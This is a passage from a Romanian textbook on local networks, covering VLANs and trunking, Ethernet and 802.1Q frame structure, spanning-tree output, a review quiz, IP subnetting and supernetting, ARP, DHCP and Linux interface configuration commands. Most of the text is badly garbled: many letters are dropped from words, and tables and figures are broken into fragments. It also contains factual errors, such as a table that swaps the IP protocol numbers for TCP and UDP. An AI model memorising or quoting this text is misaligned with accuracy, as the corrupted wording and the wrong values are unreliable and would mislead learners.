i fo eze staţiile de a age e t î legătu ă u o i e a es eauto izat sesizat. Ia da ă se
do eşte şi o u i a e î t e VLAN-u i se pot i ple e ta est i ţii pe router pe t u a o ţi e u
nivel înalt de securitate.
VLAN-u ile ofe ă u g ad a e de fle i ilitate şi s ala ilitate. Prin implementarea lor se
eează do e ii de broadcast ai i i. Asta î sea ă ă broadcast-urile trimise de un nod
dintr-u VLAN u o aju ge pe po tu ile o figu ate î alt VLAN. Aşa ă, p i at i ui ea
po tu ilo sau utilizato ilo u ui VLAN pe u s it h, se âştigă fle i ilitatea de a adăuga u ai
pe acei utilizatori pe care îi dorim în domeniul de broadcast espe ti . A eastă a o da e poate
fu ţio a şi pe t u lo a ea broadcast storm-urilor auzate de o pla ă de eţea defe tă, ât şi
pentru prevenirea unui echipament intermediar de a le propaga î toată eţeaua. A este
broadcast storm-uri se pot î tâ pla şi î ad ul u ui VLAN, da ele o fi eduse u ai la
VLAN-ul din care au pornit.
VLAN-urile impun o mai mare scalabilitate într-o eţea o utată. Câ d u VLAN de i e
prea mare, se pot crea alte VLAN-uri, oprind astfel broadcast-u ile să afe teze lăţi ea de
a dă a eţelei – u ât su t ai puţi i utilizato i î t -u VLAN, u atât u ă ul broadcast-
u ilo este ai i . T e uie î să ţi ut o t î od spe ial, â d este o a de p oie ta ea u ei
reţele u VLAN-u i, de se i iile dispo i ile î eţea şi t e uie î ţeles e a is ul o e tă ii
utilizatorilor la aceste resurse.
U alt a a taj pe a e îl ofe ă VLAN-u ile este i pa tul spo it asup a pe fo a ţei eţelei.
Putem grupa utilizatorii ce foloses apli aţii i te si e de eţea î t -un VLAN separat. De
e e plu, pute ea u VLAN sepa at pe t u u teh i ia e testează o apli aţie ulti ast şi
pe t u se e ele pe a e a esta le foloseşte. A esta se a u u a de ti pi de ăspu s foa te
buni din partea esu selo pe a e le utilizează, fii d î t -u „LAN dedi at , î ti p e î t egul
depa ta e t teh i u îşi a ai e p i a e ulţu i ea î legătu a u s ăde ea atei de
t a sfe a fil ului pe a e aşteaptă să îl do loadeze, deoa e e î t eaga apli aţie este izolată
într-un VLAN separat.
VLAN-u ile uşu ează gestio a ea ig aţiilo , adăugă ilo şi a s hi ă ilo di eţea –
network management. Prin intermediul software-ului de pe s it h se pot adăuga utilizato i
într-un VLAN, iar mai târziu li se poate s hi a apa te ţa î t -un altul. Recablarea pentru
asigu a ea o e ti ităţii u ai este e esa ă î t -o eţea o utată deoa e e tool-urile de
a age e t ale eţelei pe it e o figu a ea logi ă a sa î doa âte a se u de.
77 | ‘ e ţ e l e E t h e et
O legătură de tru hi este apa ilă să supo te ai ulte VLAN-u i, de o i ei fii d folosită
pentru a conecta switchurile de alte switchuri sau de routere. O legătu ă de t u hi poate fi
p i ită a o autost adă, pe a e i ulă aşi i e t e uie să aju gă fie a e la desti aţii dife ite.
O legătu ă de t u hi u apa ţi e u ui VLAN spe ifi , espo sa ilitatea a esteia fii d să
a ţio eze a şi o e iu e pe t u VLAN-u i î t e s it hu i şi routere. Poate fi o figu ată
pentru a transporta toate VLAN-u ile sau u ai u u ă li itat de VLAN-u i. Da ă legătu a
î t e s it hu i u este o figu ată d ept legătu ă de trunchi, atunci implicit, numai
i fo aţiile VLAN-ului o fi s hi ate pe a eastă legătu ă. O legătu ă de t u hi poate a ea
u VLAN ati , a esta fii d folosit da ă legătu ă de t u hi edează, di t -un motiv oarecare.
1 6 6 2 46-1500 4
Adresă Adresă Sumă de
Preambul Lungime/Tip Date
destinaţie sursă control
2-16: Structura cadrului Ethernet 802.3
1 6 6 4 2 46-1500 4
Adresă Adresă Sumă de
Preambul TAG Lungime/Tip Date
destinaţie sursă control
2-17: Structura cadrului 802.1Q
2B 3b 1b 12b
Identificator protocol
Prioritate CFI VLAN ID
(0x8100)
2-18: Structura câmpului TAG
De la s it hul “ la staţia B:
MAC B MAC A 0x0800 X X
2-22: Router e asigură o u i ația î tre VLAN-uri, folosi d doar o si gură i terfață fizi ă
(router on a stick).
2.5 Rezumat
După u s-a prezentat, Ethernet se bazează pe u ediu de tip pa tajat shared-media),
de i u ai o si gu ă staţie poate t a s ite la u o e t dat. Astfel, da ă u ă ul odu ilo
pe u seg e t eşte, p o a ilitatea de apa iţie a oliziu ilo se a ă i. Do e iul de
oliziu e este a ea zo ă di tr-o eţea a e a fi afe tată de apa iţia u ei oliziu i î i te io ul
ei. ‘eţeaua lo ală poate fi î pă ţită î do e ii de oliziu e sepa ate p i i te ediul u o
dispozitive din categoria switchurilor.
84 | ‘ e ţ e l e L o a l e
1
http://standards.ieee.org/regauth/oui/oui.txt
85 | ‘ e ţ e l e E t h e et
Address 0008.a327.8900
Cost 19
Port 6 (FastEthernet0/6)
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)
Address 0008.219f.5e40
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Aging Time 300
Mai sus este p eze tată ieşi ea o e zii show spanning-tree. A eastă o a dă este utilă
când se do eşte afla ea ădă i ii di p op ia eţea, p io itatea şi ad esa MAC a a estuia.
Totodată se o se ă ostul po tului p i a e se o e tează root bridge-ul la switch. Acesta are
aloa ea de , eea e i di ă faptul ă s it hul este o e tat di e t la root bridge pe portul 6.
Valo ile ti pilo de t i ite a ad elo BPDU default se . şi de t e e e di sta ea de blocking
în listening (Max Age şi apoi î learning şi forwarding (Forward Delay) sunt la valorile
implicite. “e o se ă ai i olul po t ădă i ă – Fa / şi statusul fie ă ui po t de pe s it h,
toate cele patru fiind în starea de forwarding.
SwitchA#show mac-address-table aging-time
Vlan Aging Time
---- ----------
300
Rezolvare:
1. “u esiu ea de pa hete este u ătoa ea:
De la staţia C la switchul Sw2:
MAC destinaţie MAC sursă Lungime/Tip Date CRC
MAC F MAC C 0x0800 X X
Î tre ări
1. Care este rezultatul segmentării unei reţele cu un switch ?
C eşte u ă ul do e iilo de oliziu e
“ ade u ă ul do e iilo de oliziu e
C eşte u ă ul do e iilo de oad ast
“ ade u ă ul do e iilo de oad ast
2. Care este numărul minim de adrese MAC asociate cu un switch de nivel doi?
Una
Două
Atâtea âte po tu i e istă
Niciuna
1
2
3
4
4. Ce nivel din stiva OSI este folosit de către switchurile Ethernet pentru a lua o decizie ?
Nivelul 1
Nivelul 2
Nivelul 3
Nivelul 4
fast-forward
cut-through
fragment-free
store and forward
8. Care dintre următoarele afirmaţii este adevărată cu privinţă la comutarea de nivel doi
(alegeţi două variante)?
Un switch este un hub cu mai multe porturi
Un switch este o punte cu mai multe porturi
“ it hu ile î aţă ad esele IP ale ad elo şi iau de izii pe aza a esto a
“ it hu ile î aţă ad esele MAC, e a i â d â pul su să al fie ă ui ad u
9. Switchul dumneavoastră trebuie să fie setat ca root bridge. Care dintre următoarele
posibilităţi va face acest switch să devină root bridge?
“eta ea ad esei MAC a s it hului la o aloa e i i ă
“eta ea p oto olului “TP la o aloa e i i ă
“eta ea p io ităţii s it hului la o aloa e a i ă
“eta ea p io ităţii s it hului la o aloa e i i ă
10. Un switch Ethernet dispune de o tabelă de comutare ca cea din figura de mai jos. Ce
decizie va lua switchul dacă va primi cadrul cu adresa destinaţie 00-00-3D-1F-11-03 şi adresa
sursă 00-00-3D-1F-11-01:
Staţia Port 1 Port 2 Port 3 Port 4
00-00-3D-1F-11-01 X
00-00-3D-1F-11-02
00-00-3D-1F-11-03 X X
Va trimite cadrul pe toate porturile
Va t i ite ad ul pe toate po tu ile, u e epţia po tului
Va ignora cadrul
Va trimite cadrul pe portul 1
92 | ‘ e ţ e l e L o a l e
3 Adresarea IP
Ce se î vaţă di a est apitol?
“pe ifi aţiile p oto olului IP
Noţiu i de subnetting
Fu ţio a ea p oto olului A‘P
Fu ţio a ea p oto olului DHCP
Co figu ă i de eţea î Li u
Co figu ă i de eţea î Wi do s
Cine este...
Vint Cerf este o side at pă i tele I te etului". După e a a sol it U i e sitatea
Stanford, a lucrat la IBM, iar apoi s-a întors la Universitate la UCLA, unde a conectat
p i ele două odu i a ARPA et p ede eso ul I te etului . A p oie tat p oto olul IP și a
o t i uit la dez olta ea p oto olului TCP. Di , Vi t Ce f lu ează la Google a
i ep eședi te.
0 4 8 16 19
31
vers lung. TOS Lungime totală
identificator flags decalaj
fragment
TTL Protocol suma de control a
antetului
Adresa IP sursă
Adresa IP destinaţie
Opţiuni (dacă e cazul)
Date
...
ciclarea la infinit a unor pachete IP în cazul unor topologii cu bucle de rutare. O utilizare mai
e e tă a a estui â p pe ite u ui I“P să o t oleze o e ta ea u ei staţii, pe t u o
legătu ă dată. De e e plu, u I“P poate î t e upe o e ti itatea atu i â d pe o legătu ă î
lo de o staţie se o e tează eauto izat u router e a e î spate o î t eagă eţea lo ală.
Ma ea ajo itate a t afi ului î I te et ălăto eşte î t e su să şi desti aţie păst â d
a eleaşi alo i pe t u â pu ile a tetului IP, sigu ul â p odifi at fii d â pul TTL. Deşi
ope aţia de de e e ta e a alo ii â pului TTL este u a si plă, ea dete i ă o î ă a e
se ifi ati ă a routerului, deoa e e î u a odifi ă ii a estui â p a t e ui să fie
e al ulată şi su a de o t ol a a tetului. “u a de o t ol se azează pe u algo it de
edu da ţă i li ă u algo it C‘C e a e p op ietatea ă se poate e ifi a uşo , da se
al ulează ult ai g eu e ifi a ea se poate efe tua fă ă a al ula e pli it aloa ea su ei de
control).
Câmpul protocol spe ifi ă e p oto ol a fost folosit pe t u î apsula ea de i el t a spo t.
În figura de mai jos sunt prezentate câteva dintre valorile cele mai întâlnite ale acestui câmp.
Valo ile şi su t folosite î azul tu elă ii ia aloa ea este folosită pe t u a i di a ă u
ai e istă u alt a tet, o astfel de o e iu e fii d u ită IP raw.
Valoare Protocol
1 ICMP
4 IPv4
6 UDP
17 TCP
41 IPv6
59 Fă ă a tet
3-2: Valorile câmpului protocol pentru antetul IP
Date
...
Singurul câmp din antetul IPv6 ce nu are un echivalent în antetul IPv4 este câmpul
„Eti hetă de flu . A est â p pe ite routerelo să o ute ad ele pe aza u ei alo i de
de iţi şi u pe aza ad esei desti aţie. A eastă etodă de o uta e folosi d doa o eti hetă
de de iţi , î les eşte i ple e ta ea eţelelo IP / MPL“ MultiProtocol Label Switching).
Clasa D “taţie
1 2 3 4
3-2: Adresarea IP
reţea staţie
1000 1101.0101 0101.0010 0101.10 00 0101 - 141.85.37.133
1111 1111.1111 1111.1111 1111.11 00 0000 – 255.255.255.192 - /26
---------------------------------------
1000 1101.0101 0101.0010 0101.10 00 0000 – 141.85.37.128/26 - reţea
1000 1101.0101 0101.0010 0101.10 11 1111 – 141.85.37.191/26 - difuzare
3.1.5 Subreţele
Totalitatea odu ilo e pot o u i a î t e ele folosi d dispoziti e de i el fizi şi legătu ă
de date de e e plu: epetoa e şi s it hu i defi es o eţea lo ală. Altfel spus, o eţea lo ală
va cuprinde totalitatea echipamentelo de eţea e pot o u i a fă ă i te edie ea u ui
router.
O eţea lo ală oi ide u u do e iu de difuza e. Astfel, toate staţiile di a eaşi eţea
lo ală o p i i pa hetele de broadcast.
Di oti e de se u itate, da şi pe t u opti iza ea o su ului de a dă î ad ul u ei
eţele lo ale, u ad i ist ato poate de ide sepa a ea u o se ţiu i di eţea î su eţele
dife ite. Pe t u asigu a ea ad esă ii a t e ui să î pa tă spaţiul i iţial de ad ese î ai ulte
se ţiu i disju te.
Ate ţie! Disti ţia î t e „ eţele şi „su eţele este u a pu isto i ă. „‘eţele e au
de u ite doa spaţiile de ad ese e o espu deau laselo A, B şi C. Î p eze t oţiu ile su t
folosite interschimbabil.
Pe t u a î pă ţi spaţiul de ad ese . . . / î două ju ătăţi se po eşte de la
ep eze ta ea i a ă a spaţiului i iţial, apoi su t deli itate â pu ile de eţea şi staţie. Din
â pul de staţie o fi a aţi u u ă de iţi pe t u defi i ea de su eţele. A eşti iţi o
defi i u ou â p u it â p de su eţea.
reţea staţie
10010000.00000001.00101 000.0000 0000 - 144.1.40.0/21
10010000.00000001.00101 000.0000 0000 - 144.1.40.0/22 -prima subreţea
10010000.00000001.00101 100.0000 0000 - 144.1.48.0/22 -a doua subreţea
subreţea
subreţea
99 | A d r e s a r e a I P
O dez ate e î ă î tâl ită î e o a dă ile legate de alocarea adreslor IP este cea
efe itoa e la folosi ea p i ei şi ulti ei su eţele. Î lipsa p e iză ii ăştii de eţea, ad esa
p i ei su eţele poate fi o fu dată u ad esa spaţiului i iţial. Î od si ila ad esa de
difuza e a ulti ei su eţele poate fi o fu dată u ad esa de difuza e a spaţiului i iţial. Pe t u
e e plu de ai sus . . . poate fi o i ad esa de eţea i iţială, da ă p efi ul este / , o i
p i a su eţea, da ă p efi ul este / . Ad esa . . . este ad esa de difuza e pe t u
întreg spaţiul i iţial pe t u p efi ul / , sau ad esa de difuza e a ulti ei su eţele pe t u / .
Di pă ate, e ita ea folosi ii p i ei şi a ulti ei su eţele du e la o pie de e î se ată de
ad ese. Astfel, soluţia ea ai ăspâ dită î eţelele a tuale este de a folosi p i a şi ulti a
su eţea, da u p e iza ea p efi ului sau a ăştii de eţea pe t u o i e ad esă IP.
3.1.6 Super-reţele
Di e siu ea ta elei de uta e afe tează atât late ţa p o esului de găsi e a ăii opti e,
ât şi esu sele ha d a e e esa e pe tru router (memorie, procesor). Pentru reducerea
u ă ului de ute se poate folosi p o esul de ag ega e a spaţiilo de ad ese.
Ag ega ea de ad ese este p o esul i e s î pă ţi ii î su eţele.
Î e e plul de ai jos su t p eze tate spaţii de ad ese alese spe ial a să dife e doa
p i ei ai puţi se ifi ati i doi iţi ai â pului de eţea.
reţea staţie
1011 1110.0001 0100.0000 0100.0000 0000 - 190.20.4.0/24
1011 1110.0001 0100.0000 0101.0000 0000 - 190.20.5.0/24
1011 1110.0001 0100.0000 0110.0000 0000 - 190.20.6.0/24
1011 1110.0001 0100.0000 0111.0000 0000 - 190.20.7.0/24
-------------------------------------------------------
1011 1110.0001 0100.0000 0100.0000 0000 - 190.20.4.0/22
Cele 4 clase din tabel sunt în fapt sfe tu ile u ui si gu spaţiu de ad ese. Ad esa ag egată,
sau super- eţeaua e up i de ele lase, se o ţi e î a est az edu â d as a de eţea u
doi iţi. A eşti doi iţi o fi fă uţi ze o, t e â d î â pul de staţie, pe t u a dete i a
adresa de eţea ag egată.
Este i po ta t de p e izat ă deşi . . . / este u spaţiu alid de ad ese, u poate fi
folosit pentru alocarea de adrese într-o si gu ă eţea. Î alo a ea ad eselo u se pot folosi
super- eţele ale elo lase utate. Astfel, . . . / este o su eţea di eţeaua de lasă
B . . . / şi poate fi folosit pe t u alo a ea î t -o si gu ă eţea, da . . . / este
o super- eţea e up i de lase C, ia ad ese di a est spaţiu pot fi alo ate u ai după o
î pă ţi e î su eţele.
Prefixul unei adrese IP valide nu poate fi mai mic decât prefixul clasei din care face parte
espe ti a ad esă.
Nu o i e două eţele pot fi ag egate î t -o super- eţea. Astfel, pe t u a putea p ofita de
a eastă fa ilitate adusă de VL“M, alo a ea ad eselo t e uie fă ută judi ios u doa î
i te io ul eţelei de ăt e ad i ist ato ul de eţea, i şi la i elul I“P-u ilo şi hia la i el de
ţa ă. Di pă ate, î ‘o â ia a a tajele edu e ii ta elelo de uta e p i ag ega ea eţelelo ,
ca o consecinţă a alo ă ii pla ifi ate a ad eselo de eţea, au fost o ştie tizate e t e de
târziu, astfel încât în tabelele de rutare ale marilor ISP-uri din România mai frecvent se
î tâl es p efi e de / de ât p efi e / , u a fi fost de aşteptat la o ţa ă de dimensiunile
României.
100 | ‘ e ţ e l e L o a l e
3.1.7 ARP
În prezent p oto olul de ezoluţie a ad esei – A‘P este ăzut adesea a o o po e tă
ese ţială a a hite tu ii TCP/IP, da lu u ile u au stat di totdeau a aşa. Î eputul a ilo a
ep eze tat o pe ioadă a ată de i e titudi i î eea e p i eşte sta da diza ea
p oto oalelo pe t u eţelele de al ulatoa e. Da ă la i elul eţelelo lo ale IEEE a euşit să
edu ă alege ea la t ei sta da de: Ethe et, Toke ‘i g şi Toke Bus, o u i aţia î t e a este
eţele t e uia asigu ată ori de IP ori de CLNS (Connectionless Network Service). Nici anii ce au
u at u au i pus p oto olul IP a p i ipalul âştigăto la i elul eţea de la î eputul a ilo
, o petiţia desfăşu â du-se î t e IP şi IPX sau Apple Talk.
Pe t u legătu ile pu t-la-pu t u e istă nicio dife e ţă î t e o u i aţia u i ast şi
oad ast. Di a est oti , pe t u legătu ile pu t-la-punct nu este necesar un mecanism
pentru determinarea adresei de nivel 2, folosindu-se doar adresa de difuzare. Ethernetul este
î să u ediu ultia es, putâ d e ista ai ulte desti aţii î ad ul a eleaşi eţele lo ale.
A‘P a fost sta da dizat de IETF î p i ‘FC şi ep ezi tă e a is ul pe t u
asigu a ea o u i aţiei u i ast î t -o i f ast u tu ă ultia es. Astfel, A‘P şi-a p opus să
ofe e odalitatea de aso ie e a u ei pe e hi <ad esă de eţea, p oto ol de eţea> u o ad esă
u i ă de i el legătu ă de date. Deşi sta da dul p e ede posi ilitatea fu ţio ă ii A‘P î
o ju ţie u o a ietate de p oto oale de i el eţea, î p a ti ă a esta a de e it o
o po e tă i teg a tă a sti ei de p oto oale TCP/IP/Ethe et. P i u a e, p i ipala
apli a ilitate a p oto olului A‘P a fost şi ă â e dete i a ea o espo de ţelo î t e
ad esele IP şi ad esele MAC.
A‘P se azează pe o st ui ea şi e ţi e ea u ei tabele ARP. O ta elă A‘P a e olul de a
păst a o espo de ţele î ăţate î t e ad esele IP şi ele MAC. A estea su t o st uite di a i
şi su t sto ate î e o ia ‘AM. Deşi e istă e a is e pe t u adăuga ea stati ă sau
eliminarea unei i t ă i î t -o ta elă A‘P, su t a e situaţiile î a e u ad i ist ato de eţea
va apela la ele.
Fie a e o pute sau dispoziti de eţea îşi păst ează p op ia sa ta elă A‘P, î ealitate
e istâ d âte o ta elă A‘P pe t u fie a e i te faţă a ti ă. Astfel, un router u t ei i te feţe
Ethe et a e ţi e t ei ta ele A‘P disti te.
Cu fu ţio ează ARP? Cu este o st uită ta ela ARP?
Pe t u a ealiza o figu aţiile de eţea ale u ei staţii o t e uit p e izaţi i i pat u
parametri: ad esa IP a staţiei, as a de eţea, ad esa routerului i pli it default gate a şi
adresa IP a serverului de DNS.
“e e ul de DN“ este folosit pe t u a o ţi e ad esa IP a desti aţiei po i d de la u ele
acesteia, spre exemplu o interogare de DNS va indica faptul ă www.cs.pub.ro este asociat cu
adresa 141.85.37.5.
Datele de la i elul apli aţie o fi p elu ate î o fo itate u ope aţiile spe ifi e
i elu ilo p eze ta e şi sesiu e da ă e azul după care vor fi încapsulate la nivelul transport,
precizându-se cel mai adesea tipul se i iului po tul su să, po tul desti aţie . U ează
î apsula ea i elului eţea a e a ataşa a tetul IP, a tet e a o ţi e i fo aţiile legate de
ad esa IP su să şi ad esa IP desti aţie, a easta di u ă fii d î ge e al o ţi ută î u a unei
ezoluţii de DN“. Pe t u o st ui ea a tetului de i el legătu ă de date a t e ui dete i ată
ad esa MAC desti aţie.
Ad esele de i el legătu ă de date au ele a ţă lo ală, u şi ele a ţă glo ală p e u
ad esele de i el eţea. Di a est oti ad esa MAC desti aţie di a tetul de i el doi a fi
a eeaşi u ad esa MAC a desti aţiei doa î azul î a e a easta se află î a eeaşi eţea lo ală.
Alt i te i, di pu tul de ede e al eţelei lo ale, ad esa MAC desti aţie a fi ad esa p i ului
101 | A d r e s a r e a I P
Pe t u ai ultă la itate se va folosi folosi topologia din figura de mai sus pentru a
u ă i o st ui ea ta elelo A‘P.
Î ai te de t e e ea la i elul legătu ă de date, ad esa IP desti aţie a fi ăutată î ta ela
A‘P şi efii d găsită se a ea u ad u spe ial o e e e A‘P e a a ea î â pul ad esă
desti aţie di a tet ad esa de difuza e: FF.FF.FF.FF.FF.FF, ia î â pul ad esă su să ad esa
MAC a staţiei A . Î figu a de ai jos este p eze tată st u tu a a estui ad u
Antet Date
MAC dest. MAC Tip cadru cod MAC IP su să MAC dest. IP dest
su să ope aţie su să
FFFF: 0C18: 0x0806 1 0C18: 193.23. 0000: 193.23.
FFFF: 7A11: 7A11: 1.4 0000: 1.7
FFFF 7111 7111 0000
3-8: Cerere ARP
Antet Date
MAC MAC Tip cadru cod MAC IP su să MAC IP dest
dest. su să ope aţie su să dest.
0C18: 0C18: 0x0806 2 0C18: 193.23. 0C18: 193.23.
7A11: 7A92: 7A92: 1.7 7A11: 1.4
7111 711B 711B 7111
3-9: Răspu s ARP
aflat pe alea ăt e desti aţie, altfel spus, adresa routerului implicit (default gateway . Da ă î
ta ela A‘P u e istă o i t a e pe t u routerul implicit, atunci va fi trimis un cadru cerere ARP,
pe adresa de difuzare de nivel 2, pentru a afla adresa IP a routerului implicit. Acesta va
ăspu de e e ii, u u ad u u i ast e a fi folosit pe t u a tualiza ea ta elei A‘P pe staţia
su să. Î ele di u ă a fi o st uit a tetul de i el pe t u ad ul de date, astfel î ât
ad esa IP desti aţie a fi ad esa IP a desti aţiei fi ale, da ad esa MAC desti aţie a fi ad esa
MAC a routerului implicit.
Î azul eţelei de ai sus se o side ă ă staţia A ea să o u i e u B . După ope aţia
IP A & as ă A = IP B & as ă A , se dete i ă ă B u se află î a eaşi eţea lo ală.
Astfel A1 va ăuta î ta ela A‘P o o espo de ţă pe t u ad esa routerului i pli it, adi ă
pe t u . . . . Da ă a eastă o espo de ţă u e istă, a t i ite u ad u de e e e A‘P
da a e a a ea p e izat î â pul de date a ad esă IP desti aţie . . . . Cad ul fiind
u ul de difuza e, a fi e epţio at de ăt e toate dispoziti ele de eţea aflate pe a est
seg e t. A şi A o ig o a ad ul, deoa e e a esta a a ea p e izată a ad esă IP desti aţie
altă aloa e de ât ad esele lo . Routerul va trimite un cadrul de ăspu s A‘P si ila u el di
3- ef , î a e MAC su să a fi: . . C. . A.A , ia IP su să a fi . . . .
Pe baza cadrului de cerere ARP, routerul îşi a a tualiza p op ia ta elă A‘P
o espu zătoa e i te feţei di sp e seg e tul A, ia apoi pe aza ad ului de ăspu s A îşi a
adăuga î ta ela A‘P o i t a e ouă, e fa e o espo de ţa î t e 193.23.1.1 şi ad esa MAC a
i te feţei routerului: . . C. . A.A . Di a est o e t staţia A a î apsula t a s isia
desti ată staţiei B folosi d ad esa IP a lui B 24.8.17.2) şi ad esa MAC a i te feţei e a
routerului (00.48.0C.18.7A.A2).
Ad esa desti aţie a folosi routerului pe t u a dete i a i te faţa pe a e t e uie t i is
pa hetul şi astfel p o esul de uta e a dete i a ă pa hetul t e uie t i is pe i te faţa e a
routerului. Routerul a fa e ai î tâi testul da ă i te faţa pe a e t e uie t i is pa hetul este
î a eaşi eţea u desti aţia fi ală a pa hetului. Î azul de faţă IP e & as ă e a da a elaşi
rezultat u IP B & as ă e , astfel a fi ăutată î ta ela A‘P a i te feţei e , o
o espo de ţă pe t u ad esa IP a lui B . Da ă a eastă o espo de ţă u e istă a fi t i isă o
e e e A‘P e a o ţi e ad esa IP desti aţie a staţiei B a desti aţiei fi ale).
Da ă î s hi B u a fi fost î a eaşi eţea u i te faţa e , a fi fost e t asă di uta
folosită ad esa u ăto ului hop, şi ăutată î ta ela A‘P o o espo de ţă pe t u ad esa
u ăto ului hop.
Pe t u topologia di figu ă ef , î u a a două p o ese de e e e/ ăspu s A‘P şi o
es ie e a a tetului de i el ope ată de router, pa hetul a aju ge la desti aţie, a eastă
o u i aţie si plă fii d ealizată p i t i ite ea a u ai puţi de ad e u a tete de i el
2 diferite. În plus, în tabela ARP a staţiei A , a i te feţei e , a i te feţei e şi a staţiei B a fost
adăugată âte o î egist a e
Cu a e lo o u i aţia î t e staţii aflate î eţele dife ite da ă u s-a precizat adresa
routerului implicit?
Pe t u siste ele de ope a e e ulează la i elul staţiilo , lipsa ad esei routerului implicit
e hi alează u li ita ea o u i aţiei la eţeaua lo ală. Pe de altă pa te, î azul routerelor ce
au a i te faţă de ieşi e o eţea de tip ultia es de e e plu Ethernet , da u au p e izată şi
adresa următo ului router t e uie ăutat u alt e a is pe t u a asigu a ieşi ea di eţeaua
lo ală. U az si ila este şi el al u o dispoziti e dedi ate e ulează siste e de ope a e
o oliti e, u i ple e tă i pa ţiale ale sti ei TCP/IP dato ită esu selo ha dware mult mai
li itate de ât î azul al ulatoa elo pe so ale de e e plu aşi i de a at, auto ate de
afea, et . . Atât pe t u ute i o plet spe ifi ate, ât şi pe t u i ple e tă i pa ţiale ale
sti ei TCP/IP u a ai e ista dife e ţă î t e o u i aţia î t e odu i di a eaşi eţea lo ală şi
104 | ‘ e ţ e l e L o a l e
Pe de altă pa te, î ă a ea routerului la rularea Proxy ARP u este se ifi ati ă, ai ales
pentru un router e o e tează o eţea lo ală. Di a est oti ajo itatea routerelor (toate
routerele CISCO spre exemplu) vor avea activat implicit Proxy ARP.
Î azul u ei eţele lo ale u ai ult de o si gu ă ieşi e de I te et, p e iza ea routerului
i pli it ofe ă u o t ol ult ai st i t al staţiilo , şi pe ite i ple e ta ea ala să ii pe
ază de su să a t afi ului.
Da ă s-ar a aliza st i t doa ele două p oto oale, o luzia a fi ă î azul î a e staţiile
o u i ă p epo de e t u alte staţii di ad ul a eleaşi eţele lo ale o u i aţia azată pe
folosirea routerului i pli it a fi le tă, dato ită testului supli e ta , î e e e pe t u azul
u ei eţele î a e ajo itatea t afi ului pă ăseşte eţeaua lo ală P o A‘P a e ite âte o
e e e A‘P pe t u fie a e ad esă desti aţie dife ită.
3.1.8 DHCP
DHCP (Dynamic Host Configuration Protocol) este un protocol client-server prin
i te ediul ă uia se e ul fu izează staţiei lie t pa a et ii de o figurare necesari
fu ţio ă ii î t -o eţea. DHCP ofe ă, de ase e ea, posi ilitatea o t olului a esului la
eţeaua lo ală pe ite iul ad esei fizi e , p e u şi o ilitate, uta ea di t -o eţea î alta
fii d posi ilă fă ă e o figu a ea a uală a gazdei.
DHCP fu izează u e a is p i a e se e ul at i uie ad ese IP lie ţilo . E istă t ei
odalităţi de alo a e a ad eselo IP: alo a e di a i ă, a uală sau auto ată.
Alo area di a i ă presupune definirea unui set de adrese IP. Adresele IP alocate sunt
î lătu ate di ulţi ea ad eselo dispo i ile, da î o e tul e pi ă ii pe ioadei de
î hi ie e da ă u este p elu git o t a tul de î hi ie e a estea se pot î toa e î zo a
ad eselo dispo i ile pe t u a apoi să fie alo ate u ui alt od de eţea. Perioada de închiriere
a ad eselo IP a iază î fu ţie de i ple e ta ea se e ului de DHCP, alo i uzuale fii d
sau 192 de ore.
Alo area a uală p esupu e defi i ea pe se e de aso ie i î t e ad ese MAC şi ad ese
IP. La primirea unei cereri DHCP, adresa MAC su să a fi ăutată î lista de aso ie i. Da ă u
e istă o aso ie e defi ită, î fu ţie de o figu aţie, se e ul poate ig o a e e ea, sau poate
te e î odul de alo a e di a i . Alo a ea a uală pe ite ad i ist ato ului
implementarea unor politi i de o t ol al a esului la eţea, fii d u a di t e p i ele
e o a dă i de se u iza e a eţelei lo ale. Î a elaşi ti p, pe ite u g ad de fle i ilitate
idi at î azul s hi ă ilo de topologie p e u apa iţia u ui ou se e de DHCP sau
schimbarea routerului de ieşi e di eţeaua lo ală default gateway).
Alo area auto ată î i ă si plitatea de o figu a e a alo ă ii di a i e t e uie doa
defi it setul de ad ese IP dispo i ile, şi u o listă de aso ie i MAC-IP) cu avantajele de
se u itate ale alo ă ii stati e: î azul u ui eţele u u ă de ad ese dispo i ile egal u el al
staţiilo o ouă staţie u a putea p i i pa a et ii de eţea, deoa e e o ad esă IP alo ată u
se ai î toa e î ulţi ea ad eselo dispo i ile de ât la esta ta ea se i iului de DHCP.
Fu ţio â d î eţeaua lo ală, DHCP u e esită u se i iu o ie tat pe o e iu e a e să
ofe e o t olul t afi ului, dete ta ea şi e tifi a ea e o ilo sau se e ţie ea o e tă a datelo .
U astfel de se i iu TCP a i t odu e î ă a e şi întârzieri nejustificate. De aceea, se
foloses datag a e UDP, pe po tul pe t u se e şi pe po tul pe t u lie t.
Co e saţia di t e lie t şi se e o stă î u ăto ii paşi:
1. La po i e, staţia lie t DHCP t i ite e e i pe t u i iţie ea o u i aţiei cu serverele DHCP.
Aceste cereri sunt trimise prin intermediul mesajelor BROADCAST de tip DHCPDISCOVER.
2. La p i i ea e e ilo , se e ul dete i ă da ă o poate o o a. Î az afi ati , se e ul
ăspu de u esaj UNICA“T de tip DHCPOFFE‘, a e poate i lude ad esa IP, as a de eţea,
106 | ‘ e ţ e l e L o a l e
Pe t u fie a e i te faţă fizi ă de eţea pot fi defi ite ai ulte i te feţe logi e, de u ite
su i terfețe. Di pu t de ede e logi , fie a e su i te faţă a u ui router ep ezi tă o
i te faţă disti tă. Di a est oti două su i te feţe u pot a ea ad ese IP di a eeaşi
su eţea. Î e e plul de ai jos su t defi ite ad esa IP, as a de eţea şi ad esa de difuza e
pe t u i te faţa eth : , adi ă pe t u u a di t e su i te feţele i te feţei eth :
# ifconfig eth0:1 42.1.3.1 netmask 255.255.0.0 broadcast 42.1.255.255
Astfel, pe t u o figu a ea u ui i te feţe este e esa ă p e iza ea ad esei IP, a p efi ului
de eţea, p e u şi a ad esei de difuza e:
# ip addr add dev eth0 192.168.38.11/24 broadcast 192.168.38.255
# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0a:95:e2:04:d4 brd ff:ff:ff:ff:ff:ff
inet 192.168.38.11/24 brd 192.168.38.255 scope global eth0
Pentru a defi i o figu aţii pe t u su i te feţe este folosită opţiu ea label. Din motive
de o pati ilitate, se e o a dă a u ele eti hetelo să î eapă u u ele i te feţei.
Astfel, pentru eth0 etichete valide sunt: eth00, eth0.0, eth0:0, eth0-test. Pe t u ă
ifconfig ede eti hetele a pe o i te faţă i tuală, el u poate ula de ât u ele de tip
interfaţă:număr.
